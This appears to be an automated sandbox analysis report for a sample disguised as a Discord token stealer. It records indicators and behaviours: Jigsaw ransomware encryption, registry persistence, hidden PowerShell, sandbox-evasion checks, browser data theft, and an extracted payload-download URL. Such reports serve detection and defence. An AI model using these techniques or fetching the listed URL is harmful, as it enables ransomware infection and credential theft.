Analysis
-
max time kernel
49s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
23-09-2024 12:21
Static task
static1
Behavioral task
behavioral1
Sample
PanKoza2.0DiscordTokenStealer2024.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
PanKoza2.0DiscordTokenStealer2024.exe
Resource
win10v2004-20240802-en
General
-
Target
PanKoza2.0DiscordTokenStealer2024.exe
-
Size
9.5MB
-
MD5
6c21e9957b540c1fc5c6c30f991423dd
-
SHA1
3937d74580a14bb8debd9c763fb1816cb26b881d
-
SHA256
fd6b4896e31a516c1aceae5d2e82822dc0efdecbcebf882b2875e57ce9e26cb0
-
SHA512
f4b7825e1cd7267b2bc9e8801c19ae72b76a0269dd0fb144303494882eb68bc4f0e2d8b6766f80252b6acd12090a6b6f0c4bc5e2c089d35a24e0a64de2bda5ba
-
SSDEEP
196608:weurQ4kCMsjWDqYbcMtnpVGNrzUrTg6aXW/aHIFU7s39:C84keyDFcMtpcqI62WO
Malware Config
Extracted
http://onion1.host:443/temper/PGPClient.exe
Signatures
-
Jigsaw Ransomware
Ransomware family first created in 2016. Named based on wallpaper set after infection in the early versions.
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\mylfhgizta\\kxjus.exe" OMG u guize ROGUEAMP IS A 1337 UTUBEZ haXx0r.exe -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2268 324 CmD.ExE 39 -
Renames multiple (115) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (462) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1348 powershell.exe -
Office macro that triggers on suspicious action 1 IoCs
Office document macro which triggers in special circumstances - often malicious.
resource yara_rule behavioral1/files/0x0006000000018d68-113.dat office_macro_on_action -
resource behavioral1/files/0x0006000000018d68-113.dat -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CollabVM.exe CollabVM.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CollabVM.exe CollabVM.exe -
Executes dropped EXE 11 IoCs
pid Process 2908 CollabVM.exe 2520 yababi.exe 2556 donut.exe 3020 jigsaw_ransom.exe 1496 yababi.exe 572 OMG u guize ROGUEAMP IS A 1337 UTUBEZ haXx0r.exe 2724 Windows Service.exe 844 drpbx.exe 2344 33mUjiePDre8dNmanDApdX6l4KVMDcBS.exe 2348 kxjus.exe 2108 kxjus.exe -
Loads dropped DLL 13 IoCs
pid Process 2232 PanKoza2.0DiscordTokenStealer2024.exe 2232 PanKoza2.0DiscordTokenStealer2024.exe 2232 PanKoza2.0DiscordTokenStealer2024.exe 2232 PanKoza2.0DiscordTokenStealer2024.exe 2520 yababi.exe 2232 PanKoza2.0DiscordTokenStealer2024.exe 2232 PanKoza2.0DiscordTokenStealer2024.exe 1496 yababi.exe 2232 PanKoza2.0DiscordTokenStealer2024.exe 572 OMG u guize ROGUEAMP IS A 1337 UTUBEZ haXx0r.exe 572 OMG u guize ROGUEAMP IS A 1337 UTUBEZ haXx0r.exe 572 OMG u guize ROGUEAMP IS A 1337 UTUBEZ haXx0r.exe 1212 Process not Found -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x0006000000016ee0-64.dat upx behavioral1/files/0x00060000000175c6-63.dat upx behavioral1/memory/572-77-0x0000000000400000-0x00000000005E8000-memory.dmp upx behavioral1/memory/1496-79-0x000007FEF2560000-0x000007FEF29CE000-memory.dmp upx behavioral1/files/0x0002000000003e63-246.dat upx behavioral1/memory/2348-263-0x0000000000400000-0x00000000005D1000-memory.dmp upx behavioral1/memory/572-260-0x0000000000400000-0x00000000005E8000-memory.dmp upx behavioral1/memory/2108-268-0x0000000000400000-0x00000000005D1000-memory.dmp upx behavioral1/memory/1496-267-0x000007FEF2560000-0x000007FEF29CE000-memory.dmp upx behavioral1/memory/2348-360-0x0000000000400000-0x00000000005D1000-memory.dmp upx behavioral1/memory/2348-361-0x0000000000400000-0x00000000005D1000-memory.dmp upx behavioral1/memory/2108-363-0x0000000000400000-0x00000000005D1000-memory.dmp upx behavioral1/memory/2348-368-0x0000000000400000-0x00000000005D1000-memory.dmp upx behavioral1/memory/2348-589-0x0000000000400000-0x00000000005D1000-memory.dmp upx behavioral1/memory/2348-2566-0x0000000000400000-0x00000000005D1000-memory.dmp upx behavioral1/memory/2348-3000-0x0000000000400000-0x00000000005D1000-memory.dmp upx behavioral1/memory/2348-3003-0x0000000000400000-0x00000000005D1000-memory.dmp upx behavioral1/memory/2348-3437-0x0000000000400000-0x00000000005D1000-memory.dmp upx behavioral1/memory/2348-3439-0x0000000000400000-0x00000000005D1000-memory.dmp upx behavioral1/memory/2348-3444-0x0000000000400000-0x00000000005D1000-memory.dmp upx behavioral1/memory/2348-3446-0x0000000000400000-0x00000000005D1000-memory.dmp upx -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" jigsaw_ransom.exe Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\donut.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\33mUjiePDre8dNmanDApdX6l4KVMDcBS.exe" donut.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks registry for disk virtualization 3 TTPs 1 IoCs
Detecting virtualization disks is order done to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet002\Enum\SCSI\Disk&Ven_Dell&Prod_VIRTUAL_DISK kxjus.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 6 yandex.com 14 yandex.com -
Maps connected drives based on registry 3 TTPs 1 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum kxjus.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.bmp" 33mUjiePDre8dNmanDApdX6l4KVMDcBS.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\DVD Maker\Shared\DissolveNoise.png drpbx.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Cave_Drawings.gif drpbx.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\ExecutiveMergeLetter.dotx drpbx.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\wsgen.exe.fun drpbx.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\README.txt.fun drpbx.exe File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Essential.xml.fun drpbx.exe File opened for modification C:\Program Files\7-Zip\Lang\el.txt drpbx.exe File created C:\Program Files\7-Zip\Lang\ku.txt.fun drpbx.exe File created C:\Program Files\7-Zip\Lang\pa-in.txt.fun drpbx.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_glass_Thumbnail.bmp drpbx.exe File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml.fun drpbx.exe File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Trek.xml.fun drpbx.exe File created C:\Program Files\7-Zip\Lang\zh-cn.txt.fun drpbx.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png drpbx.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javaw.exe drpbx.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\rmiregistry.exe.fun drpbx.exe File opened for modification C:\Program Files\Java\jre7\bin\keytool.exe drpbx.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\java-rmi.exe.fun drpbx.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\jmap.exe.fun drpbx.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\jrunscript.exe.fun drpbx.exe File opened for modification C:\Program Files (x86)\Internet Explorer\ieinstal.exe drpbx.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\A3DUtility.exe drpbx.exe File created C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe.fun drpbx.exe File opened for modification C:\Program Files\7-Zip\Lang\ja.txt drpbx.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\helper.exe drpbx.exe File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw48.png drpbx.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe drpbx.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf drpbx.exe File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apex.xml.fun drpbx.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe drpbx.exe File opened for modification C:\Program Files\Windows Media Player\Network Sharing\ConnectionManager.xml drpbx.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipsrom.xml drpbx.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\jstat.exe.fun drpbx.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\orbd.exe drpbx.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\sa-jdi.jar.fun drpbx.exe File created C:\Program Files\VideoLAN\VLC\uninstall.exe.fun drpbx.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwrcommonlm.dat drpbx.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ipsplk.xml drpbx.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_selectionsubpicture.png drpbx.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Pushpin.xml drpbx.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\AdjacencyReport.dotx drpbx.exe File opened for modification C:\Program Files\7-Zip\Lang\co.txt drpbx.exe File opened for modification C:\Program Files\7-Zip\Lang\ga.txt drpbx.exe File created C:\Program Files\7-Zip\Lang\nl.txt.fun drpbx.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessApplications.RuntimeUi.xml drpbx.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Small_News.jpg drpbx.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\ExecutiveNewsletter.dotx drpbx.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwrlatinlm.dat drpbx.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_SelectionSubpictureA.png drpbx.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\ktab.exe.fun drpbx.exe File opened for modification C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_120.jpg drpbx.exe File opened for modification C:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceArray.txt drpbx.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmiregistry.exe drpbx.exe File created C:\Program Files\Java\jre7\bin\pack200.exe.fun drpbx.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\icon.png drpbx.exe File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Couture.xml.fun drpbx.exe File opened for modification C:\Program Files\7-Zip\Lang\sk.txt drpbx.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_photo_Thumbnail.bmp drpbx.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar drpbx.exe File created C:\Program Files\Java\jre7\bin\unpack200.exe.fun drpbx.exe File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Median.xml.fun drpbx.exe File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic 2.xml.fun drpbx.exe File opened for modification C:\Program Files\7-Zip\Lang\kaa.txt drpbx.exe File created C:\Program Files\Microsoft Games\Purble Place\PurblePlace.exe.fun drpbx.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 1 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh kxjus.exe -
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CollabVM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OMG u guize ROGUEAMP IS A 1337 UTUBEZ haXx0r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 33mUjiePDre8dNmanDApdX6l4KVMDcBS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet002\Control\Nls\Language kxjus.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kxjus.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language kxjus.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PanKoza2.0DiscordTokenStealer2024.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CmD.ExE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kxjus.exe -
Office loads VBA resources, possible macro or embedded object present
-
Checks SCSI registry key(s) 3 TTPs 8 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK kxjus.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet002\Enum\SCSI kxjus.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet002\Enum\SCSI kxjus.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet002\Enum\SCSI kxjus.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet002\Enum\SCSI\Disk&Ven_Dell&Prod_VIRTUAL_DISK kxjus.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI kxjus.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI kxjus.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI kxjus.exe -
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor kxjus.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor kxjus.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor kxjus.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 kxjus.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 kxjus.exe -
Enumerates system info in registry 2 TTPs 41 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 kxjus.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController kxjus.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter kxjus.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 kxjus.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral kxjus.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 kxjus.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor kxjus.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor kxjus.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 kxjus.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter kxjus.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses kxjus.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus kxjus.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController kxjus.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController kxjus.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 kxjus.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral kxjus.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral kxjus.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController kxjus.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController kxjus.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral kxjus.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral kxjus.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 kxjus.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 kxjus.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 kxjus.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 kxjus.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController kxjus.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 kxjus.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 kxjus.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral kxjus.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus kxjus.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 kxjus.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses kxjus.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor kxjus.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 kxjus.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 kxjus.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 kxjus.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus kxjus.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter kxjus.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 kxjus.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS kxjus.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses kxjus.exe -
Modifies Control Panel 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Control Panel\Desktop\WallpaperStyle = "1" 33mUjiePDre8dNmanDApdX6l4KVMDcBS.exe Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Control Panel\Desktop\TileWallpaper = "1" 33mUjiePDre8dNmanDApdX6l4KVMDcBS.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main kxjus.exe Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{5AAED511-79A6-11EF-93F4-C28ADB222BBA} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 324 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2216 powershell.exe 2692 powershell.exe 1348 powershell.exe 572 OMG u guize ROGUEAMP IS A 1337 UTUBEZ haXx0r.exe 2348 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2108 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2108 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2108 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2108 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2108 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2108 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2108 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2108 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2108 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2108 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2108 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2108 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2108 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2108 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2108 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2216 powershell.exe Token: SeDebugPrivilege 2692 powershell.exe Token: SeDebugPrivilege 2724 Windows Service.exe Token: SeDebugPrivilege 1348 powershell.exe -
Suspicious use of FindShellTrayWindow 9 IoCs
pid Process 324 WINWORD.EXE 324 WINWORD.EXE 2348 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 892 iexplore.exe 2348 kxjus.exe -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 2348 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe 2348 kxjus.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
pid Process 2724 Windows Service.exe 324 WINWORD.EXE 324 WINWORD.EXE 2348 kxjus.exe 2348 kxjus.exe 892 iexplore.exe 892 iexplore.exe 888 IEXPLORE.EXE 888 IEXPLORE.EXE 888 IEXPLORE.EXE 888 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
